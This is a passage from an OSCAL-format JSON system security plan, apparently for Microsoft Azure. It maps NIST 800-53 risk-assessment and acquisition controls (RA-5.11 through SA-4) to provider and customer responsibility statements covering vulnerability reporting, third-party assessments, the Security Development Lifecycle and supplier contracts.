vulnerability-related data are used for these scans including MSRC, vendor websites, and other third-party websites. The Security Response Team reviews historic log data as needed for incident investigation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c57a3e49-4908-475b-ab95-2e986d348d84","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-026"}],"description":"The customer is responsible for reviewing historic audit logs to determine if a vulnerability identified within customer-deployed resources has been previously exploited.","provided-uuid":"8b0b67c7-967d-4a47-ad51-41c0bb4cc94d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7786d732-feab-4642-a72e-575f08f7baf3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-5.11","statements":[{"uuid":"feaf7420-5e92-42d8-9e44-edfed61b2d37","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-5.11_smt","by-components":[{"uuid":"d978921a-03e4-4bd4-be4f-7fcb573d3b3d","export":{"provided":[{"uuid":"f03a134b-b9d5-42b8-a950-3b519383fd4f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-027"}],"description":"The Azure Continuous Monitoring and Azure Security teams establish public reporting channels for receiving reports of vulnerabilities. The Azure Security Team has websites external customers can leverage to report vulnerabilities. The Azure Continuous Monitoring team members have subscriptions from external websites that report vulnerabilities such as from Cybersecurity Infrastructure Security Agency (CISA), Qualys KB, Qualys vulnerability scanning, MSRC internal Microsoft communications, NIST, and NVD websites. Vulnerabilities obtained from external channels are assessed to determine if they impact Azure compliance boundary. If found to impact Azure compliance boundary, the Azure Continuous Monitoring team tracks the vulnerabilities as open POA&Ms and coordinate with Azure Security and Service Teams to dive the vulnerabilities to closure."}],"responsibilities":[{"uuid":"d029752f-190e-491e-8897-99518b25c9fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-027"}],"description":"The customer is responsible for establishing a public reporting channel for receiving reports of vulnerabilities in organizational systems and system components for customer-deployed resources.","provided-uuid":"f03a134b-b9d5-42b8-a950-3b519383fd4f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0bf53830-e8e0-4ea4-8688-bd88489ea89a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-7","statements":[{"uuid":"59cf44b5-cde8-4919-a51a-6c5259007643","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-7_smt","by-components":[{"uuid":"92cf71e5-f7ed-4a03-9bb3-d9959e21c787","export":{"provided":[{"uuid":"ef1fb8a7-8c5b-4376-986d-ed827e4911d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"}],"description":"Azure employs an approved Third-Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with security control requirements. Azure adds findings identified in 3PAO monthly continuous monitoring and annual audit assessments into Plan of Actions & Milestone (POA&M) spreadsheets for remediation tracking. Depending on the risk of the finding, Azure takes appropriate action to remediate findings in accordance with FedRAMP Continuous Monitoring Guidelines. The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"59895e08-c698-43d2-b96d-a97b274d93ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-028"}],"description":"The customer is responsible for responding to findings from security and privacy assessments, monitoring, and audits in accordance with customer risk tolerance for customer-deployed resources.","provided-uuid":"ef1fb8a7-8c5b-4376-986d-ed827e4911d9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2e512f8f-68c3-4b4c-b6b5-f71f677f7b86","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ra-9","statements":[{"uuid":"1c59d1ef-7d60-4c97-b9a2-cd76b888a7a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ra-9_smt","by-components":[{"uuid":"41e1adca-93c9-45b7-b82a-a29a955add37","export":{"provided":[{"uuid":"2602cd04-b711-434e-952e-008e8f14cbbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"}],"description":"To identify and apply the appropriate asset classification, the Microsoft Asset Owner performs the following steps: * Business Requirements: The Asset Owner identifies any unique requirements that apply to the Online Service based on use-case scenarios and business requirements. This includes understanding data requirements as described in the Data Classification Standard. * Risk Evaluation: The Asset Owner assesses the risks and the impacts that would be related to the asset if its confidentiality, integrity, or availability were to be compromised. Impact criteria are defined in the Asset Classification Standard. * Classification: The Asset Owner selects the appropriate classification based on the risk and valuation of the asset. * Protection: The Asset Owner directs the application of security protection measures and controls required by the asset classification (per the Asset Protection Standard) as well as any additional required controls. * Periodic Monitoring: The Asset Owner periodically reviews the risks and classification of the asset to ensure they remain appropriate or corrects them as needed. The criteria describe the impact that would be incurred by Microsoft, Microsoft's shareholders, partners, or customers, the Asset Owner's organization, or dependent or reliant organizations if the asset's confidentiality, integrity, or availability were to be compromised. In some scenarios multiple types of impact may apply; the Asset Owner then chooses the highest and/or most relevant impact when making the classification decision."}],"responsibilities":[{"uuid":"a731e05f-edec-4bae-a1f4-8e9a64c31935","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"RA-14-029"}],"description":"The customer is responsible for identifying critical information system components and functions by performing a criticality analysis for customer-defined information systems, information system components, or information system services at customer-defined decision points in the system development life cycle.","provided-uuid":"2602cd04-b711-434e-952e-008e8f14cbbb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2ba717f1-1973-4a01-bde1-1deffb357351","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-2","statements":[{"uuid":"879aee04-67f1-48dc-a6b5-cbf52d1d4fbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.a","by-components":[{"uuid":"16460076-c5ff-4cee-bf1e-75c73edf8c77","export":{"provided":[{"uuid":"910171eb-8780-4d83-a8f0-1ba9d01890dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"}],"description":"Microsoft implements the allocation of resources control as part of Phase One: Requirements, of the Microsoft Security Development Lifecycle (SDL) Process. The Requirements phase of the SDL includes considerations for security and privacy at a foundational level-and a cost analysis-when a determination is made if development and support costs for improving security and privacy are consistent with business needs. Microsoft includes a determination of security requirements at the onset of a project to allow for development teams to identify key milestones and deliverables, and permits the integration of security and privacy in a way that minimizes any disruption to plans and schedules. Security and privacy requirements analysis is performed at project inception and includes specification of minimum security requirements for the application as it is designed to run in its planned operational environment and specification and deployment of a security vulnerability/work item tracking system. Likewise, Microsoft included information security requirements for Azure in mission/business process planning consistent with the terms of the Azure offering."}],"responsibilities":[{"uuid":"b805673c-ffae-4e27-97ec-227241a3665d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining the high-level information security and privacy requirements of customer-deployed resources in mission and business process planning.","provided-uuid":"910171eb-8780-4d83-a8f0-1ba9d01890dc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e70415ce-659c-4ed9-a4da-987340b1a095","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.b","by-components":[{"uuid":"52ab5128-ee2f-4fb5-9432-263ae2eec630","export":{"provided":[{"uuid":"78a1a40b-c22b-4a33-bd7c-013caf2b4048","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"}],"description":"Microsoft annually budgets funding necessary to support all services and the corporate security and privacy posture across the entire company. Microsoft has determined, documented, and allocated the resources required to protect the information system as part of its capital budgeting process. The information security control requirements are documented in this SSP. In addition, as part of the budgeting process, C+AI Security conducts capacity planning which includes the determination of the overall size, performance and resilience of the system. These elements are important to the overall security functionality of the system in terms of how security controls impact Azure's performance, as well as, how the resiliency of the system supports data availability and continuity objectives. Capacity planning depends largely upon the proposed usage of the system. Processing and storage requirements for Azure are defined before development in order to ensure adequate resources are available. Azure capacity planning includes operating requirements, projected trends, new business requirements, and resistance to denial-of-service attacks in order to avoid preventable system deficiencies. The capacity planning process is through C+AI Security and part of the budget allocation."}],"responsibilities":[{"uuid":"963eac1f-20c5-465d-9860-07aa7eea2fee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for determining, documenting, and allocating the resources required to protect customer-deployed resources as part of capital planning and investment control.","provided-uuid":"78a1a40b-c22b-4a33-bd7c-013caf2b4048"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bf9a4697-be09-4a85-983f-a2924c44da55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-2_smt.c","by-components":[{"uuid":"1c1e0d46-d753-443a-9abf-1faa7375ed27","export":{"provided":[{"uuid":"f9ce8a2b-d8e8-45b4-8c9e-1e69621014c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"}],"description":"The Microsoft Security Program Policy (MSPP) outlines the capacity planning process, to ensure adequate allocation of resources; it also includes technical requirements along with future capacity and security projections. Microsoft establishes discrete line items for information security, change management, and budgeting documentation, where required. Budgets are created for different departments within Microsoft and information security is considered."}],"responsibilities":[{"uuid":"8e181177-2a3f-4341-94a0-1c8b0e6d192a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible including a discrete line item for information security in programming and budgeting documentation when allocating resources.","provided-uuid":"f9ce8a2b-d8e8-45b4-8c9e-1e69621014c7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c2ddf2dd-2ca2-4201-b895-3dbb7eefe13e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-3","statements":[{"uuid":"a969214b-3d54-47f5-95c4-c7891f14350a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.a","by-components":[{"uuid":"b5f98c5f-c3bb-444a-8bec-f45541a55cc3","export":{"provided":[{"uuid":"5f340164-640f-45a2-87d5-7d61434758df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"}],"description":"Microsoft implements lifecycle support for Azure services through its Security Development Lifecycle (SDL) process. The SDL consists of a security requirements analysis and applicability that must be completed for all service development projects. This analysis acts as a framework and includes the identification of possible risks to the finished service as well as mitigation strategies which can be implemented and tested during the development phases. A Threat Modeling security review is included during the SDL process. Microsoft integrates essential information technology (IT) security considerations defined in NIST Special Publication 800-160 Volume 1 as revised into the established Microsoft SDL process. Pre-SDL Requirements: Security Training All members of service development teams receive appropriate training to stay informed about security basics and recent trends in security and privacy. Individuals who develop services are required to attend at least one security training class each year. Security training can help ensure services are created with security and privacy in mind and can also help development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education that is appropriate to their needs or products. SDL Core Phases The Microsoft SDL process includes the following phases: * Phase 1: Requirements - The Requirements phase of the SDL includes the project inception-when the organization considers security and privacy at a foundational level-and a cost analysis-when determining if development and support costs for improving security and privacy are consistent with business needs. This phase also includes defining security roles and responsibilities and identifying individuals with these roles and responsibilities. * Phase 2: Design - The Design phase is when the organization builds the plan for how to take the project through the rest of the SDL process-from implementation, to verification, to release. During the Design phase the organization establishes best practices to follow for this phase by way of functional and design specifications, and by performing risk analysis to identify threats and vulnerabilities in the service. TMA (Threat Model Analysis) is required to define all attack surfaces and their associated risks; all security gaps and risks and documented and analyzed. This security impact analysis results in dataflow documentation in order to identify all intended paths for information and potential attack vectors. * Phase 3: Implementation - The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the service securely. To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts, dated September 2009 for the information system consistent with the Azure offering's requirements. * Phase 4: Verification - During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push-which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and edit. A public release privacy review is also completed during the Verification phase. * Phase 5: Release - The Release phase is when the organization prepares the service for consumption and prepares for what happens once the service is released. One of the core concepts in the Release phase is response planning-mapping out a plan of action, should any security or privacy vulnerabilities be discovered in the release-and this carries over to post-release, as well, in terms of response execution. Post-SDL Requirement: Security Servicing and Response Execution After a service is released, the product development team must be available to respond to any possible security vulnerabilities or privacy issues that warrant a response. In addition, the development team is required to follow the Azure Incident Management Standard Operating Procedure (SOP) for potential post-release issues. Azure has implemented information validation through checking of data inputs as part of the SDL process. Thorough code reviews and testing are completed during the Verification Phase of the SDL prior to service being put into a production environment. The code reviews and testing check for cases of SQL injection, format string vulnerabilities, XSS, integer arithmetic, command injection, and buffer overflow vulnerabilities. For more details on the SDL process, please refer to <https://www.microsoft.com/en-us/securityengineering/sdl.>"}],"responsibilities":[{"uuid":"fbac0d2a-6fe7-4221-8c00-63ffb433a297","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for acquiring, developing, and managing customer-deployed resources using a system development life cycle (SDLC), that incorporates information security and privacy considerations.","provided-uuid":"5f340164-640f-45a2-87d5-7d61434758df"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1b66b92-59aa-4226-bffd-ba91852b5198","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.b","by-components":[{"uuid":"e71d73b1-bae7-415e-97c6-032db76a2ec2","export":{"provided":[{"uuid":"6cdd933a-a6c3-457e-b3e1-0eafb5114af8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"}],"description":"The SDL includes general criteria and job descriptions for security and privacy roles. These roles are filled during the Requirements Phase of the SDL process. These roles are consultative in nature, and provide the organizational structure necessary to identify, catalog, and mitigate security and privacy issues present in a service development project. As part of the SDL, Azure has defined a dedicated security team responsible for conducting reviews, setting standards, and monitoring compliance with regulatory requirements, standards, and policies. Specific roles and responsibilities for the team include: * C+AI Security Assurance: This role is filled by security subject-matter experts (SMEs) from outside the project team. The Security Assurance team manages the SDL program and process within C+AI and conducts threat modeling sessions for project teams. * Compliance and Privacy Advisor: The advisor (or group of individuals) from the compliance team is responsible for attesting to compliance (or non-compliance) with security and privacy requirements without interference from the project team. * Team Champions: The team champion roles are filled by SMEs from the project team. These roles are responsible for the negotiation, acceptance, and tracking of minimum security and privacy requirements and maintaining clear lines of communication with advisors and decision makers during a service development project. * A training and awareness team responsible for educating project teams about security standards, policies, and best practices. * Help desk personnel to answer common questions and, as needed, escalate to the security and privacy SMEs. * Personnel responsible for authoring checklists, standards, and even corporate policy to meet security and privacy requirements. * Account management SME that acts as a liaison with application teams, manages the application portfolio, and ensures that the process for SDL compliance runs smoothly. * Remediation and risk management personnel, who both prioritize applications for assessment and manage the remediation of high-risk vulnerabilities found during the assessment. * The Operations team which conducts network and host scanning post-assessment across the enterprise and production servers."}],"responsibilities":[{"uuid":"591fa849-af40-49f4-a31d-bc9714bf58bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing customer-deployed resources using a system development life cycle (SDLC), which identifies and documents information security and privacy roles and responsibilities.","provided-uuid":"6cdd933a-a6c3-457e-b3e1-0eafb5114af8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75e9ffd4-c0a7-49fd-8221-2f9ccfe8089f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.c","by-components":[{"uuid":"107fa36c-151e-405d-8142-2c6e4c96106f","export":{"provided":[{"uuid":"971ffb09-28f1-48d0-a354-28cd58125ee2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"}],"description":"Section 5 of this SSP refers to the individuals having Information Security roles and responsibilities."}],"responsibilities":[{"uuid":"aa619b98-4c39-4699-ae51-ade893912e59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing customer-deployed resources using a system development life cycle (SDLC), including the identification of individuals having information security and privacy roles and responsibilities.","provided-uuid":"971ffb09-28f1-48d0-a354-28cd58125ee2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c4ec82a2-5420-4a74-808b-bf14ee5d2da6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-3_smt.d","by-components":[{"uuid":"6fbfb0bf-a708-4730-85ee-277948e06f86","export":{"provided":[{"uuid":"3f62f428-033b-4d99-a46c-02dc8971cf4d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"}],"description":"Azure integrates the organizational information security risk management process into the SDL process. Please see Part a above for details on how Azure's SDL process facilitates the integration of the information security architecture with the organizational risk management."}],"responsibilities":[{"uuid":"9161595a-1d08-44ef-8054-c250beb1f3f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for integrating the customer's information security risk management process into SDLC activities.","provided-uuid":"3f62f428-033b-4d99-a46c-02dc8971cf4d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e819862e-192a-46d3-bff4-1f3629b653cd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4","statements":[{"uuid":"fd339421-600b-4641-aa7b-dbedd0cf977b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.a","by-components":[{"uuid":"a85ff708-3b73-4ed7-93ab-b381a644e1a0","export":{"provided":[{"uuid":"578f0af3-0a14-4256-ae3e-0da25894556b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"9e696b6f-b0f3-4717-8a7c-068a5ae8f43a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-013"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"578f0af3-0a14-4256-ae3e-0da25894556b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"36b3537f-7b26-4f6c-b033-03ee0d2f5e0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.b","by-components":[{"uuid":"808cc35b-a24c-40cc-8c9d-39f56ce05902","export":{"provided":[{"uuid":"c0047e53-5a7d-4d08-aa02-4032ff5a5bfd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"}],"description":"Microsoft requires all device security documentation and tests all security requirements and functions in lab/development environments before implemented in production. Whenever feasible, Microsoft has selected system components and products that have been evaluated on Common Criteria, FIPS (e.g., Federal Information Processing Standards (FIPS) 140-2), Center for Information Security, Security Content Automation Protocol (SCAP) and other standards for deployment within Azure. Microsoft engages only those third parties that have signed a contract and have been approved by the Procurement and Microsoft Corporate, External, and Legal Affairs (CELA) teams. In accordance with the MSSA, contracts require that the third party implement security procedures to prevent disclosure of Microsoft confidential information and provide all pertinent information describing the functional requirements or specifications of the security controls that are to be employed within the system. Additionally, third parties who have access to the Azure environment must employ a formal contract that defines the responsibilities and requirements for maintaining the security, confidentiality, integrity, and availability of the information assets involved with the contract."}],"responsibilities":[{"uuid":"b306ee66-9dba-4576-ab0e-ac02870ed156","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-014"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"c0047e53-5a7d-4d08-aa02-4032ff5a5bfd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5ec288fc-63c6-4f87-ad2e-e950a6484848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.c","by-components":[{"uuid":"0768ac37-b6aa-4c4c-ae1f-dd8746b91a0f","export":{"provided":[{"uuid":"6c76f7bf-ea18-4a83-a54e-3d530115f14f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"c13aae19-6044-4ac5-88d6-4952a7b27ef0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-015"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"6c76f7bf-ea18-4a83-a54e-3d530115f14f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75bd6bf4-01f9-4d1d-a040-4b1c479f1763","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.d","by-components":[{"uuid":"c92f75f3-1012-4869-b98a-99844ad49e79","export":{"provided":[{"uuid":"3b3319f8-36d6-435d-b3d5-f0b79c48c799","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or 